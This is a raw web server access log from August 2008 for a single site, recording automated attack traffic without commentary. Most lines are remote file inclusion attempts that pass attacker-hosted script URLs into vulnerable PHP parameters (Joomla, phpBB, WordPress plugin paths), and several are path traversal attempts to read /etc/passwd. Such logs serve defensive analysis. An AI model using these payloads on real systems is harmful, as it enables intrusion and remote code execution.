74.53.240.146 - - [24/Aug/2008:09:32:53 -0700] "GET /logs/access_080711.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:09:32:59 -0700] "GET /logs/access_080625.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:09:32:59 -0700] "GET /logs/access_080306.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:09:32:59 -0700] "GET //admin/classes/errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:09:32:59 -0700] "GET /logs//admin/classes/errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:09:32:59 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:09:33:00 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.85.215.9 - - [24/Aug/2008:09:33:01 -0700] "GET /logs/access_080217.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:33:04 -0700] "GET /logs/access_080207.log//skin/zero_vote/error.php?dir=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:33:04 -0700] "GET //skin/zero_vote/error.php?dir=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:33:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:33:15 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:33:16 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:33:16 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:33:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:33:16 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:33:17 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:33:31 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:33:32 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:33:32 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [24/Aug/2008:09:33:33 -0700] "GET /logs/index.php?loc=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [24/Aug/2008:09:33:34 -0700] "GET /index.php?loc=http://www.apnic.net/index.html? HTTP/1.0" 200 9844 "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:33:37 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:33:37 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:33:37 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:33:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:33:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:09:33:50 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:34:18 -0700] "GET /logs/access_080731.log/index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:34:18 -0700] "GET /logs/index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:34:19 -0700] "GET /index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 9898 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:34:21 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:34:22 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 200 9952 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:34:23 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:34:27 -0700] "GET //?path%5Bdocroot%5D=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 200 9882 "-" "libwww-perl/5.65" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:34:32 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:34:32 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:34:33 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:34:34 -0700] "GET /logs/access_080131.log/index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:34:35 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:34:35 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:34:37 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
89.111.176.96 - - [24/Aug/2008:09:34:39 -0700] "GET //admin/classes/errors.php?error=http://xwarezx.secretivens.com/a4.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.210.195 - - [24/Aug/2008:09:34:54 -0700] "GET //ws/login.php?includedir=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [24/Aug/2008:09:34:54 -0700] "GET /logs/scripts.log//ws/login.php?includedir=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [24/Aug/2008:09:34:54 -0700] "GET /logs//ws/login.php?includedir=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:34:58 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:34:59 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:09:35:04 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:09:35:05 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:09:35:05 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:35:28 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:35:28 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:35:28 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:35:33 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:35:36 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 200 9952 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:35:37 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:35:41 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:35:41 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:35:41 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.88.11 - - [24/Aug/2008:09:36:00 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 200 50 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.93.56.80 - - [24/Aug/2008:09:36:00 -0700] "GET /logs/access_080201.log/%03/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [24/Aug/2008:09:36:01 -0700] "GET /%03/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.88.11 - - [24/Aug/2008:09:36:01 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 200 50 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.93.56.80 - - [24/Aug/2008:09:36:01 -0700] "GET /logs/%03/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.88.11 - - [24/Aug/2008:09:36:01 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:36:01 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.88.11 - - [24/Aug/2008:09:36:01 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.216.249.151 - - [24/Aug/2008:09:36:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
209.216.249.151 - - [24/Aug/2008:09:36:02 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
209.216.249.151 - - [24/Aug/2008:09:36:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:36:02 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 200 9952 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.151 - - [24/Aug/2008:09:36:03 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:09:36:04 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:36:05 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:36:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.187.94.181 - - [24/Aug/2008:09:36:06 -0700] "GET //index.php?DOCUMENT_ROOT=http://mabat.edumining.info/files/oye.txt?? HTTP/1.1" 200 9885 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:36:10 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:36:13 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:36:14 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:36:14 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.54.60 - - [24/Aug/2008:09:36:22 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:36:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:36:36 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:36:36 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:36:37 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:36:37 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.25 - - [24/Aug/2008:09:36:39 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:36:44 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.181.105.117 - - [24/Aug/2008:09:36:48 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.181.105.117 - - [24/Aug/2008:09:36:48 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.181.105.117 - - [24/Aug/2008:09:36:48 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.181.105.117 - - [24/Aug/2008:09:36:49 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
